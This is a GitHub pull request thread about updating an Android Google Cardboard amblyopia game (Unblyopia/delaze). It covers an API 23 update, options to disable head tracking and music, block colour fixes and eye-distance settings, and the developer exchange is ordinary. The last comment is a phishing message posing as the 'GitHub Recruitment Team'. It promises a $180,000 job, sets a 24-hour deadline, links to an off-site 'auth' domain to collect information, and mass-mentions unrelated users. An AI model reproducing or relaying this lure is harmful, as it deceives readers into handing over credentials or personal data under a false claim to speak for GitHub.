Updated to API23 and some user options added

aliaksei135 opened the pull request:
- Updated Deprecated methods and built on API23 (Android 6.0)
- Cleaned up unused resources
- Added and implemented options to disable head tracking and background music
- Added about Section and Instructions on how to play
- Increased the consecutive/holding input lag time slightly

aliaksei135 committed:
Updated deprecated methods and built on API level 23 (Android 6.0)

aliaksei135 committed:
Added Settings to disable head tracking and music. Added About section and playing instructions

aliaksei135 committed:
Cleaned up Resources, tweaked lag values

aliaksei135 committed:
Cleaned up Repo

raphaelrk commented:
Did you test this? Can merge if tested (don't have enough space on my computer to reinstall android dev tools)

raphaelrk commented:
Why disable headtracking? How would people play without it? This project deviates from the research paper because it's on the Google Cardboard. Let me know your thoughts

aliaksei135 commented:
All tested and working.

For now the volume keys can be used if not using head tracking, however @urbster1 is going to make dpad controls as well.

Personally, I find the spinning around on the spot a bit tiring and almost nauseating after a couple of games.

aliaksei135 committed:
Redesigned block colouring logic

aliaksei135 committed:
Delete manifest-merger-debug-report.txt

aliaksei135 committed:
Delete app-release.apk

Old APK

aliaksei135 committed:
Cleaned up using Android Lint

aliaksei135 committed:
Merge branch 'new-block-design' of https://github.com/aliaksei135/delaze into new-block-design

urbster1 commented:
Is there a working build? I don't have permission to merge the pull requests but I'd really like to give it a try!

aliaksei135 commented:
@urbster1 I've hidden it a bit :p
https://github.com/aliaksei135/delaze/tree/new-block-design/Unblyopia/app/build/outputs/apk
This has the new blocks as well

urbster1 commented:
Oh right! Thanks a bunch. It's definitely on the right track! I noticed there's still a bit of a shadowy tint in the parts of the blocks that are supposed to be shown to the other eye and it's allowing me to "cheat". Also, sometimes the entire block shows in one eye. Otherwise it's working well!

aliaksei135 commented:
@urbster1 Thats next on my list to fix when I have some time!

aliaksei135 committed:
Added user global colours and fixed colour shadowing

aliaksei135 commented:
@urbster1 I have fixed the shadowing and added in the ability to change the game colours (allowing some painful colour combinations :stuck_out_tongue_winking_eye:), also added in the ability to scroll on the about dialog (which I forgot last time)

aliaksei135 committed:
Mass cleaning up of repo

aliaksei135 committed:
Added ability to change distance between the eyes (in case of different viewers)

aliaksei135 commented:
@raphaelrk I have built and tested it. Can this be merged?

JK-0 commented:
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
ltchr, @JYama321, @mmicome, @zunjooo, @man27382210, @cencuansen, @fede-rodes, @luisberns, @Deniscapp, @hanovo, @jmoore53, @wouterds, @Ruethairat, @SlandKiss, @gacryp, @ralphchristianeclipse, @maintao, @Colex, @mailaneel, @brunowego
